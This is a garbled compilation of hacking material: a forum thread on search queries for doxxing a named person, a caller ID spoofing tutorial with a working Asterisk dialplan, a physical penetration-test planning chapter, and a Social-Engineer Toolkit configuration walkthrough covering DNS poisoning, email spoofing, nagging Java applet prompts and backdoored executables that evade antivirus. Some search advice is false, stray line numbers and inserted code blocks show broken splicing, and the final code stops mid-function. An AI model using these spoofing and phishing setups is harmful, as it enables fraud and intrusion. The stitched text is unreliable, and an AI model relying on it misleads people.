0x00sec - The Home of the Hacker
Gathering Sensitive Information: Advanced Search Queries
Social Engineering
socialengineering
Merozey (Merozey) 2016-05-24 15:56:47 UTC #1

**What Are Search Queries Again?**

When you type something into Google, or whatever you are using, you for obvious reasons don't get all the results on your search, because that would simply be way too much data for your computer to handle. Hence, that is why Google has so many and such big servers - not fit for your laptop or desktop.

Definition:
A web search query is a query that a user enters into a web search engine to satisfy his or her information needs. - According to Wiki at least.

That would be the ideal definition you'd get by asking a non-hacker. However, now let's imagine you asked Merozey, and see what you would get.

Definition:
By performing a search query in a database holding useful information, your query will go through the most popular databases potentially holding your answer, and will display that information accordingly, depending on its popularity.

**Basics of Advanced Search Queries:**

So, let me introduce to you a search query I use quite often actually, because it is very convenient, and provides good results. What I am introducing to you is your new friend called A. He looks like this:

@

This little fella can pull some good information in a short and sweet search query looking something like this:

@MichaelOregon

Remember our friend Michael that we are trying to DoX?
What is the @ doing exactly?

It narrows down your results tremendously, because as I mentioned above, your search query goes through hundreds of databases, and if you don't put in @, you will receive everything that has either Michael or Oregon in it. Therefore it is very effective to put in @, because it will look for specifically those 2 names TOGETHER. You will of course still get useless information, but that won't be what's being displayed to you at the top of your page. Usually (if done correctly) you should see potential social media profiles, and websites etc. first, and then useless information. Trust me, it will save you a lot of time.

**Advanced Search Queries:**

Now, let's move on to the big boy stuff. It is guaranteed that no average PC user is aware of this, because why would they? My other friend is also very good at pulling some information when I am looking for specifically a certain thing.

" "

This guy right here can show you for example a specific location. Let's say you are looking for Michael and you have heard rumours he might be living in the USA, but even more, he might be living near Pennsylvania. So one thing you could do is this:

@MichaelOregon “Pennsylvania”

This will display (hopefully) a Michael Oregon living in Pennsylvania with potential addresses.

I will possibly make a #2 on Advanced Search Queries.
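The point of the post above, that a quoted phrase is mandatory and must appear as a whole while bare terms are matched loosely, is easy to see in a toy search engine. The following is an added example written for this page, not code from the post or from any search engine: it parses a query into quoted phrases (straight or curly quotes, as in the post) and loose terms, requires every phrase to occur with its words adjacent and in order, and ranks the remaining documents by how many loose terms they contain. The DOCS corpus is a constructed set of fake pages.

```python
import re

# Constructed sample corpus of fake "pages"; no real people or sites.
DOCS = {
    "social-1": "Michael Oregon - profile - lives in Pennsylvania, USA",
    "news-2": "Oregon wildfire update: Michael reports from the scene",
    "blog-3": "Travel notes from Pennsylvania: Pittsburgh to Philadelphia",
    "bio-4": "Michael Oregon, photographer, based in Portland",
}

# A quoted phrase, delimited by straight or curly double quotes.
_QUOTED = r'["“”]([^"“”]+)["“”]'


def tokens(text):
    """Lower-case alphanumeric word tokens; punctuation and '@' are dropped."""
    return re.findall(r"[a-z0-9]+", text.lower())


def parse_query(query):
    """Split a query into exact phrases (quoted) and loose terms (everything else)."""
    phrases = [" ".join(tokens(p)) for p in re.findall(_QUOTED, query)]
    loose = tokens(re.sub(_QUOTED, " ", query))
    return phrases, loose


def contains_phrase(doc_tokens, phrase):
    """True if the phrase's words occur adjacently and in order in the document."""
    words = phrase.split()
    n = len(words)
    return any(doc_tokens[i:i + n] == words for i in range(len(doc_tokens) - n + 1))


def search(query, docs=DOCS):
    """Rank documents: every quoted phrase is mandatory; loose terms are OR'd and
    only contribute to the score, which is why quoting narrows the result set."""
    phrases, loose = parse_query(query)
    hits = []
    for doc_id, text in docs.items():
        dt = tokens(text)
        if not all(contains_phrase(dt, p) for p in phrases):
            continue  # a missing or non-adjacent phrase disqualifies the page
        score = sum(dt.count(t) for t in loose)
        if loose and score == 0:
            continue  # with no phrases, at least one loose term must match
        hits.append((score, doc_id))
    return [doc_id for _, doc_id in sorted(hits, key=lambda h: (-h[0], h[1]))]
```

Running search("Michael Oregon") returns every page mentioning either word, while search('"Michael Oregon" Pennsylvania') keeps only the page where the two names are adjacent and Pennsylvania also appears.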
_gumby (Juan) 2016-05-24 16:04:34 UTC #2

Good info! You'd be surprised how much info you can get on a target from advanced Google queries. For those interested in a book to train your Google-fu: http://www.amazon.com/Google-Hacking-Penetration-Testers-Johnny/dp/1597491764

OilSlick 2016-05-24 16:10:56 UTC #3

:thumbsup: Quality information for those unaware; should go through some advanced Google-Fu as it were, would be a solid foundational series.

random-man (random-man) 2016-05-24 16:54:19 UTC #4

Awesome. Thanks for the useful info.

n3xUs 2016-05-24 21:55:05 UTC #5

Great post! Really useful, I'd definitely like to see Advanced Search Queries #2. However, I do have one question: do these search queries only work with the Google search engine, or do they also work with Duckduckgo or Disconnect.me?

Merozey (Merozey) 2016-05-25 13:15:15 UTC #6

Essentially they should work on all search engines; the results will possibly vary from each search engine, since your results are displayed according to the databases Google uses to retrieve data.

system (system) 2018-01-21 00:38:38 UTC #7

This topic was automatically closed after 30 days. New replies are no longer allowed.

INFORMATION

http://www.social-engineer.org/ - A free learning resource for Social Engineers, made by Social Engineers
http://www.social-engineer.org/framework/general-discussion/ - More information on Social Engineering
https://www.cybrary.it/ - A free learning platform for everything CyberSec
https://www.cybrary.it/course/social-engineering/ - Link to the SE course on Cybrary.it

TOOLS

http://www.social-engineer.org/framework/se-tools/ - A list of tools and capabilities necessary to the Social Engineer
http://www.asterisk.org/ - VoIP software (allows Caller ID spoofing after some configuration)
http://social-engineer.org/wiki/archives/CallerIDspoofing/CallerID-SpoofingWithAsterisk.html - Tutorial on how to use Asterisk
http://www.paterva.com/web7/ - Maltego
http://www.social-engineer.org/framework/se-tools/computer-based/maltego/ - Overview of Maltego from an SE point of view
http://www.yasni.com/ - People search engine
http://www.whitepages.com/name/Anywho-Anywhere - Another people search engine

-----------------------------------


Caller ID Spoofing w/ Asterisk

Caller ID is often thought of as the ultimate way to see who is calling you. People use it to screen calls all the time. When you're able to spoof that number to whatever you would like, you can easily defeat the human habit of screening out calls from people they don't want to talk to. Besides letting you get in touch with those ignoring your calls, it can be an attacker's best friend: he or she can simply spoof your bank's number and social engineer you into giving out valuable information. Given how much people rely on caller ID, it is unlikely the victim will realize what has happened until it is far too late.

Hardware Used:

 Intel P4 box with 1GB of RAM

Software Used:

 Ubuntu 7.10 Server
 Asterisk
 VMWare Workstation

Prerequisites

 VoIP service from companies like NuFone or VoicePulse which allow you to use your own PBX
 Asterisk installed and able to run
 Basic Linux knowledge

Table of Contents

 Introduction
 Configuring Asterisk
 Final Thoughts

Introduction

There are three main configuration files that need a bit of tweaking to get Asterisk working properly: iax.conf, sip.conf and extensions.conf. The names pretty much tell you what each configures. IAX is Inter-Asterisk eXchange, the protocol used when connecting two Asterisk servers; because it carries signalling and media over a single UDP port it is well suited to NAT traversal, unlike the nightmare that is SIP. SIP is the protocol that software-based phones or hardware IP phones use to connect to the Asterisk box, and extensions.conf holds the dialplan that processes call flow and routing. These configuration files all follow the standard "INI" layout, where sections are denoted as [section1] and variables under a section are declared simply as var=foo.

Configuring Asterisk

The first thing we'll cover is setting up the connection to your VoIP provider. Most good providers will give you a sample IAX configuration file that you can look over for the specifics of your service, but in most cases simply open /etc/asterisk/iax.conf and add a few lines at the end as follows:

[VoicePulse]
type=peer
host=server.example.voicepulse.com
username=SomeuSer
secret=PaSsWorD

The first line gives this connection a human-readable name. type tells Asterisk what kind of connection this will be; peer means we will be sending calls through this connection. host, username and secret are used to make the connection and authenticate, and all of them should be given to you by your provider. As you can see, this configuration is very basic; there are many more options you would set if this were going to be used in a production environment. The next file we need to edit is /etc/asterisk/sip.conf.

[sipuser]
type=peer
host=dynamic
username=allan
secret=1234
context=outgoing

The first line is again used to give the connection a name, and type lets Asterisk know we can send calls to this connection and also accept calls out of it. Setting host to dynamic makes Asterisk keep track of the IP address or hostname of the connection when the phone registers, since the phone uses a dynamic IP. username and secret are the username and password used to make the connection, and context simply tells Asterisk which context in the extensions configuration to use. This lets Asterisk route the call as needed, and it can be set differently for each SIP user if you like. The last configuration file is in the same directory and is named extensions.conf. Open it up and add the following to the end:

[outgoing]
exten => _1NXXNXXXXXX,1,SetCallerID(2024561111)
exten => _1NXXNXXXXXX,n,Dial(IAX2/VoicePulse/${EXTEN})

Once again the first line gives a name to our settings. In this case it is called a context, and that is what Asterisk uses to place calls based on your own rules. The next two lines match any 1 + 10-digit US number. The leading underscore marks the extension as a pattern; N and X are wildcards, N matching any digit from 2 to 9 and X matching any digit from 0 to 9. The 1 tells Asterisk to do that command first and n is used to say "do this next", in basic terms. SetCallerID() is the key to spoofing caller ID: here you can change the number to whatever you would like, though most providers require a 10-digit number while others will let you set your caller ID even to numbers like 911. (SetCallerID() was deprecated in Asterisk 1.4 and removed in later releases; on a current Asterisk the equivalent line is Set(CALLERID(num)=2024561111).) The next command is Dial(), which is what we use to send off the call. Its argument tells Asterisk to use the IAX2 protocol over our VoicePulse connection and to route the call to the number we dialed; ${EXTEN} is the channel variable holding the dialed number that matched the pattern.
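The pattern matching and caller ID setting described above, worked through as an added Python example that is not part of the tutorial or of Asterisk itself: it implements Asterisk's dialplan wildcards (N, X, Z, explicit [..] digit sets, . and !), parses the [outgoing] context exactly as written above, and flags any SetCallerID() value that is not in an allowlist of numbers the PBX is entitled to present, which is the check a provider or a defender reviewing a dialplan would want. The OWNED_NUMBERS allowlist is hypothetical.

```python
import re

# Constructed copy of the [outgoing] context from the tutorial above.
EXTENSIONS_CONF = """
[outgoing]
exten => _1NXXNXXXXXX,1,SetCallerID(2024561111)
exten => _1NXXNXXXXXX,n,Dial(IAX2/VoicePulse/${EXTEN})
"""

# Hypothetical allowlist: numbers this PBX is actually entitled to present.
OWNED_NUMBERS = {"2125550100"}

# Asterisk dialplan wildcards; a pattern extension starts with "_".
_WILDCARDS = {"X": "[0-9]", "Z": "[1-9]", "N": "[2-9]", ".": ".+", "!": ".*"}


def pattern_to_regex(pattern):
    """Translate an Asterisk dialplan pattern such as _1NXXNXXXXXX into a regex."""
    if not pattern.startswith("_"):
        return re.escape(pattern)  # a literal extension: exact match only
    out, i, body = [], 0, pattern[1:]
    while i < len(body):
        ch = body[i]
        if ch == "[":  # explicit digit set, e.g. [2-9], copied through verbatim
            j = body.index("]", i)
            out.append(body[i:j + 1])
            i = j + 1
            continue
        out.append(_WILDCARDS.get(ch, re.escape(ch)))
        i += 1
    return "".join(out)


def matches(pattern, number):
    """True if the dialed number is matched by the dialplan pattern."""
    return re.fullmatch(pattern_to_regex(pattern), number) is not None


def parse_context(text, name):
    """Return (pattern, priority, application, args) for each exten line of a context."""
    lines, current = [], None
    line_re = re.compile(r"exten\s*=>\s*([^,]+),([^,]+),(\w+)\((.*)\)\s*$")
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif current == name:
            m = line_re.match(line)
            if m:
                lines.append(m.groups())
    return lines


def spoofed_caller_ids(text, context, owned=OWNED_NUMBERS):
    """Flag SetCallerID() values the PBX is not authorised to present."""
    found = []
    for pattern, _prio, app, args in parse_context(text, context):
        if app == "SetCallerID" and args.strip() not in owned:
            found.append((pattern, args.strip()))
    return found
```

With the allowlist as given, the tutorial's dialplan is reported because 2024561111 is not a number the PBX owns; with that number added to OWNED_NUMBERS the check is silent.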

Everything should now be set up correctly and ready to use. The only thing left to configure is your softphone or IP phone, depending on what you are using. This is specific to individual phones and out of the scope of this project, but essentially you tell your phone to connect to your Asterisk server. From experience, softphones will often refer to this as "realm" or "domain" depending on which phone you use (I recommend X-Lite or Twinkle). Besides that it will just ask for your username and password, which were set up in sip.conf.

CID Spoofing In Action

As you can see, because the receiving carrier looks up the name (CNAM) for the number presented, it shows the owner of that number as well as the number itself. Sorry about the image quality; I could not take a picture of my phone without it being blurry :( but you get the idea.

Final Thoughts

Caller ID spoofing was not in itself illegal when this was written; what you had to worry about was committing fraud, against which there are plenty of laws. (Since then the US Truth in Caller ID Act of 2009 has made it an offence to spoof caller ID with the intent to defraud, cause harm or wrongfully obtain anything of value.) The real use of caller ID spoofing is to just trick your friends and have some fun. Don't do anything stupid. This is just information I'm trying to spread in order to show people that you can't always trust what your caller ID says.

-------------------------------------------
170

Unauthorised Access

2
Planning Your Physical Penetration Tests

The first casualty of war is the plan.
unknown

The goal of this chapter is to give you the knowledge to build the right team to carry out a physical penetration test. This is no small task; it involves assembling a team, designating appropriate roles, organizing preliminary research and being able to confidently plan the assignment from start to finish. There are also administrative and legal aspects to take into consideration. After the planning phase of the project is complete, your team members should know what is expected of them and, just as importantly, what to expect from the assignment. Work you put into the planning phase will be rewarded during execution.

There is an old joke that ‘in theory, theory and practice are the same thing, but in practice they’re not’. Touché. The important thing to remember during the planning phase is that nothing is, nor should be, set in stone. Your testing plan should be flexible enough to accommodate contingency arrangements should assumptions turn out to be incorrect or should circumstances you previously took for granted change. This chapter is drawn from my own experience planning physical penetration tests. My own methods have been tweaked over years of experience. You should draw from it or add to it as befits the individual requirements of your team.

When putting together an engagement scenario, you must consider the potential risks your client faces and what benefit physical testing will provide to them. If you perform generic testing or just go through the motions, you are wasting everyone’s time and money. Consider this example: A high-end optics company wants a physical test performed on their European headquarters. The facility is large and employs several hundred people (mainly sales, middle management and support personnel). The site also houses the distribution warehouse for all products shipped to Europe, the Middle East and Africa. What is their primary risk? It’s not espionage: no research and development is performed at the site although, like all the company’s sites worldwide, it’s networked. This company makes cameras, scanners and lenses, which is not a controversial line of business per se; therefore, the risk of infiltration by journalists and activists is minimal. In this instance, the biggest concern is probably simple theft. As the company produces devices that cost many thousands of dollars and fit into a backpack, the warehouse would be a tempting target for thieves. This is not to say that the offices, staff and computer network should not be considered in a penetration test but you must identify the client’s risks as they relate to their business interests.

The above notwithstanding, a lot of the time you won’t have much input into determining the target assets and will be heavily directed to the areas that the client wants tested. However you should not be shy in saying if you think any given scenario offers little real-world value and suggesting better alternatives. In the previous example, a testing team would have little difficulty in entering the target offices and taking photographs but would completely ignore the real issues. Risks vary between organizations but consider the examples in Table 2.1.

Table 2.1 Organization types and risks

Business area                  | Example risk     | Example scenario
Central government or military | Terrorist attack | Smuggling a package into a secure area.
Corporate headquarters         | Espionage        | Access to files or computer systems.
Luxury car dealership          | Theft            | Removing assets.

Building the Operating Team

The operating team actually carries out the physical penetration and members can be divided into different roles with different responsibilities and areas of expertise. The team makeup will vary with each test as no two are alike; consequently, it is not enough to build one team and hope for the best. This must be done in the planning phase for every test. Financial and other practical considerations make it likely that these roles will overlap and team members will assume more than one role even within a single test.

Operator

Operator is a generic term used to refer to a core member of the operating team. This term is used to refer to all team members regardless of their specialties or roles. The basic operator role is where everybody starts before training in a specialist field. Though all team members may accurately be referred to as operators, these are usually the people who directly participate in testing rather than in a support role. As I say, the term is generic and does not imply expertise in any given role.

Team Leader

This team member has the ultimate responsibility for delivering the assignment, managing the project and team members, liaising with the client, and so on. This role shouldn’t be permanent but cycled. This gives everyone leadership experience and encourages fresh approaches. The team leader usually leads the team in the field but sometimes this needs to be done from headquarters (HQ) where he takes the role of coordinator. It is not unusual to delegate the role of team leader to an operator in the field while retaining an HQ coordinator, as this gives you the best of both worlds.

Coordinator or Planner

The coordinator directs and assists team members from HQ or from another offsite location when the team leader is deployed with the main operating team. This member of the team ensures that offsite assistance (technical, legal, reference, social engineering, etc.) is always available. When direct offsite coordination of deployed operators is unnecessary, it is still usual to have someone in this role and absolutely critical if multiple vectors or teams are deployed simultaneously against the same target. A common example would be a physical test carried out in parallel with a computer-based intrusion, particularly when information from each team needs to be fed into the other; a successful computer intrusion may depend on information gathered on site and a successful physical intrusion may need ongoing remote intelligence or some form of electronic control.

Social Engineer

Social engineering is the art of deception and human manipulation, a critical skill to the success of the sort of engagement discussed in this book. The basics of social engineering are discussed in Chapter 4 but expertise in this field cannot easily be taught; it is either natural or learned through experience.

Social engineering is mostly performed off site and is an attack commonly performed prior to physical testing. That being said, all operators can be expected to perform some degree of social engineering while on site.

Computer Intrusion Specialist

This role is also referred to as the ‘ethical hacker’, a discipline in and of itself. The computer intrusion specialist is responsible for gaining access to computers and networks. In the context of a physical penetration test, this will usually (but not exclusively) be performed on site. The key targets in physical penetration testing are usually information systems, therefore it is unlikely you will have much long-term success unless your resources include people capable of this kind of work. Luckily, the computer-penetration testing industry is booming and this skill set is not hard to find.

Physical Security Specialist

This team member should be skilled in picking locks and in profiling and defeating physical security measures in general. Usually at least one member of the team should have rudimentary skills in this area. Picking locks is not difficult but it does take practice and a little luck. I cover everything you need to get started in Chapter 5 and refer to various bits of equipment that will make your life a little bit easier.

Surveillance Specialist

This team member is expected to be able to capture photos of buildings, staff, badges, dumpsters and perimeter security. Surveillance staff should obviously be skilled with a camera although this is only the most basic prerequisite. A surveillance operator is a core member of the team and must be capable of gathering evidence by covert means on foot, in a vehicle or by public transport. Covert photography is discussed in Chapter 6 and expands a little on these themes.

Assigning Roles to Team Members

The roles in the previous sections do not describe individual team members but specialist skill sets – the roles that any given team member may be asked to assume in the execution of a test. Only the largest testing groups will be able to deploy operating team roles at this level of resolution. Even then, doing so is neither cost effective nor operationally efficient.

Efficiency demands that individual team members adopt multiple areas of responsibility. For example, information gathering is not listed as a specialist skill set. This is something that every team member will have to contribute to throughout the test and, given the numerous disciplines this encompasses, it cannot be considered ‘specialist’ per se.

Some equipment is standard on all assignments; some is not required; much is optional. The overall nature of the test and the roles a particular team member has been assigned should determine the equipment you allocate to team members. A comprehensive discussion of kit can be found in Chapter 8.

The very definition of a team means that individual team members will have different skill sets and will be naturally predisposed towards certain roles. Allocating an ethical hacker to a social-engineering role is not just a waste of resources but demonstrates a lack of understanding of the qualities that make up a good social engineer. They are not necessarily compatible with the nature of an ethical hacker. In principle at least, anyone can learn and become skilled at ethical hacking, photography, or lock picking. Social engineering requires a certain kind of personality: confident, extroverted, and generally good with people. This is not something in which one can become accredited. On the other hand, the abilities of a computer intrusion specialist may not be immediately apparent to somebody inexperienced in ethical hacking. Therefore practitioners must either have demonstrable experience in the field or possess baseline accreditation (the former being preferable). Security accreditation is discussed in the appendices.

I strongly advise that when putting together a team you include only your own staff members. Using contractors is not recommended for operational and legal reasons. Think about this from the perspective of your client who might object to you bringing in third parties who may be unknown to you and whose credentials may be harder to verify.

Project Planning and Workflow

As you plan your project, create a workflow to be sure that you cover all aspects of the assignment. The workflow in Figure 2.1 shows the stages, more or less, that any physical test will follow. Although vague, the chart

[Figure 2.1 A physical test workflow. Stages shown in the chart: Receive Engagement; Negotiate Rules of Engagement; Allocate Preliminary Roles; Information Gathering; Photographic Surveillance; Reappraise Roles; Social Engineering; Execute Assignment; Write Report; Perform Preliminary Research; Determine Risk; Determine Equipment; Write Test Plan; Complete Documentation Requirements.]

-------------------------------------------

How to Hack Like a Pornstar
Master the secrets of hacking through real-life hacking scenarios

Copyright © 2017 Sparc FLOW
All rights reserved. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law.
ISBN 978-1-5204-7851-7

Foreword

This is not a book about information security. Certainly not about IT. This is a book about hacking: specifically, how to infiltrate a company’s network, locate their most critical data, and make off with it without triggering whatever shiny new security tool the company wasted their budget on.

Whether you are a wannabe ethical hacker or just an enthusiast frustrated by outdated books and false media reports, this book is definitely for you.

We will set up a fake – but realistic enough – target and go in detail over the main steps to 0wn the company: building phishing malware, finding vulnerabilities, rooting Windows domains, p0wning mainframes, etc.

I have documented almost every tool and custom script used in this book. I strongly encourage you to test them and master their capabilities (and limitations) in an environment you control and own. Given the nature of this book, it is ludicrous to expect it to cover each and every hacking technique imaginable, though I will try my best to give as many examples as I can while staying true to the stated purpose of the book.

433stated purpose of the book.
434The brain behind SET is the configuration file. SET by default works perfect for most people however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory:
435
436root@bt:/pentest/exploits/set# ./set-update
437
438U src/payloads/set_payloads/http_shell.py
439
440U src/payloads/set_payloads/shell.py
441
442U src/payloads/set_payloads/shell.windows
443
444U src/payloads/set_payloads/set_http_server.py
445
446U src/payloads/set_payloads/persistence.py
447
448U src/payloads/set_payloads/listener.py
449
450U src/qrcode/qrgenerator.py
451
452U modules/ratte_module.py
453
454U modules/ratte_only_module.py
455
456U set-automate
457
458U set-proxy
459
460U set
461
462U set-update
463
464U readme/LICENSE
465
466U readme/CHANGES
467
468root@bt:/pentest/exploits/set#
469
470Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Let’s walk through each of the flags:
471
472root@bt:/pentest/exploits/set# nano config/set_config
473
474# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
475
476METASPLOIT_PATH=/pentest/exploits/framework3
477
478Looking through the configuration options, you can change specific fields to get a desired result. In the first option, you can change the path of where the location of Metasploit is. Metasploit is used for the payload creations, file format bugs, and for the browser exploit sections.

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap

The Ettercap section is used when you are on the same subnet as the victims and you want to perform DNS poisoning attacks against a subset of IP addresses. When this flag is set to ON, SET will poison the entire local subnet and redirect a specific site, or all sites, to your malicious server.

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF

Setting the SENDMAIL flag to ON will try to start sendmail, which can spoof source email addresses. This attack only works if the victim's SMTP server does not perform reverse lookups on the hostname (and, against current mail infrastructure, only if the spoofed sender domain publishes no SPF or DMARC policy, since those checks cause mail from an unauthorised sending host to be rejected or quarantined). sendmail must be installed; if you're using BackTrack 4, it is installed by default.

# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF

Setting WEBATTACK_EMAIL to ON allows you to send mass emails to the victims while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu; when this flag is enabled it adds the ability to email victims links, to improve your attacks.

# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL —> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF

The Java Applet attack vector has one of the highest success rates of anything in SET's arsenal. To make the attack look more believable, you can turn this flag on, which allows you to sign the Java applet with whatever publisher name you want. Say you're targeting CompanyX: the standard applet is signed by Microsoft, but you can sign the applet as CompanyX to make it look more believable. Note that a self-signed certificate only controls the publisher string shown in the dialog; the applet is not trusted by any CA, so the Java security warning still appears. This requires you to install Java's JDK (on Ubuntu, apt-get install sun-java6-jdk or openjdk-6-jdk).

# THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFE$
# THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION
JAVA_ID_PARAM=Secure Java Applet
#
# JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA AP$
# THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. T$
# A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK
JAVA_REPEATER=ON

When a user gets the Java applet warning, they will see 'Secure Java Applet' as the name of the applet instead of the IP address, which adds to the applet's believability. The second option will prompt the user over and over with nagging Java applet warnings if they hit cancel. Normally a cancel renders the attack useless; with the repeater enabled, the prompt keeps popping up until the user clicks Run.

# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON

The AUTO_DETECT flag is probably the most asked-about setting in SET. In most cases SET will grab the interface you use to connect out to the Internet and use its IP address as the reverse-connection address. Many attacks need to be customized and may not be on the internal network: if you set this flag to OFF, SET will prompt you with additional questions when setting up the attack. Turn it OFF when you want to use multiple interfaces, have an external IP, or are in a NAT/port-forwarding scenario.

# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80

By default the SET web server listens on port 80; if for some reason you need to change this, you can specify an alternative port.

# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary

When using SET's payload encoding options, the best option for anti-virus bypass is the backdoored executable: a legitimate exe with a Metasploit-based payload hidden inside it, which can generally evade most AV products. SET ships with an executable for this purpose; if for some reason you want to use a different executable, you can specify the path to it with the CUSTOM_EXE flag.

# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www

The web server built into SET is custom-coded and can at times be somewhat slow. If you find that you need a boost and want to use Apache, flip this switch to ON and SET will use Apache to handle the web requests, speeding your attack up. Note that this only works with the Java Applet and Metasploit-based attacks: because the web jacking, tabnabbing and credential harvester methods rely on intercepting the submitted credentials in SET's own server, Apache cannot be used with them.
573
```
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
```

In some cases, when you're performing an advanced social-engineering attack, you may want to register a domain and buy an SSL certificate to make the attack more believable. SSL-based attacks can be incorporated into SET by turning WEBATTACK_SSL to ON. You can use self-signed certificates as well; however, the victim's browser will show an "untrusted certificate" warning when they visit your website.
601
```
# TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000
```

The web jacking attack works by replacing the page in the victim's browser with another window that is made to look like a legitimate site. This attack is very dependent on timing: if you're doing it over the Internet, I recommend a delay of 5000 (5 seconds); if you're on an internal network, 2000 (2 seconds) is probably a safe bet.
609
```
# PORT FOR THE COMMAND CENTER
COMMAND_CENTER_PORT=44444
#
# COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST ONLY. IF YOU WANT TO ENABLE IT
# SO YOU CAN HIT THE COMMAND CENTER REMOTELY PUT THE INTERFACE TO 0.0.0.0 TO BIND TO ALL INTERFACES.
COMMAND_CENTER_INTERFACE=127.0.0.1
#
# HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLO$
ENCOUNT=4
```

The command center is the web GUI for the Social-Engineer Toolkit. If you want to run it on a different port, change this number. The next option specifies which interface the SET web interface listens on. If it is set to 127.0.0.1, nobody from outside the host can reach the web interface; if you set it to 0.0.0.0, it binds to all interfaces and can be reached remotely. Be careful with this setting. The ENCOUNT flag determines how many times a payload is encoded when using the standard Metasploit payloads in SET. By default it is 4, but if you require fewer or more passes you can adjust this accordingly.
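Several of the settings above (WEB_PORT, APACHE_SERVER, WEBATTACK_SSL with its PEM paths, SELF_SIGNED_CERT, UPX_PATH and especially COMMAND_CENTER_INTERFACE) have a safe value and a value the manual warns about. The following is an added example, not part of the SET project or of the original post: a small Python linter that parses the KEY=VALUE format of config/set_config and reports the combinations this section calls out, so a reviewer can check a config before the tool is started. The sample config embedded in it is constructed for the example; the function names are my own.

```python
"""Lint a set_config-style file for the settings the manual calls out."""
import ipaddress
from typing import Dict, List

# Constructed sample in the KEY=VALUE format of config/set_config. The values
# are illustrative and deliberately include the risky combinations.
SAMPLE_CONFIG = """\
# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF
WEB_PORT=80
APACHE_SERVER=ON
APACHE_DIRECTORY=/var/www
WEBATTACK_SSL=ON
SELF_SIGNED_CERT=ON
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=
COMMAND_CENTER_PORT=44444
COMMAND_CENTER_INTERFACE=0.0.0.0
ENCOUNT=4
UPX_ENCODE=ON
UPX_PATH=
"""


def parse_set_config(text: str) -> Dict[str, str]:
    """Parse KEY=VALUE lines; '#' comment lines and blank lines are skipped.

    Only the first '=' separates key from value, because a value may itself
    contain '=' or ';' (the METERPRETER_MULTI_COMMANDS setting is one example).
    """
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def lint_set_config(settings: Dict[str, str]) -> List[str]:
    """Return one human-readable finding per risky or inconsistent setting."""
    findings: List[str] = []

    def is_on(key: str) -> bool:
        return settings.get(key, "OFF").upper() == "ON"

    # 127.0.0.1 keeps the web GUI local; anything non-loopback (0.0.0.0 in
    # particular) exposes the command center to the network.
    iface = settings.get("COMMAND_CENTER_INTERFACE", "127.0.0.1")
    try:
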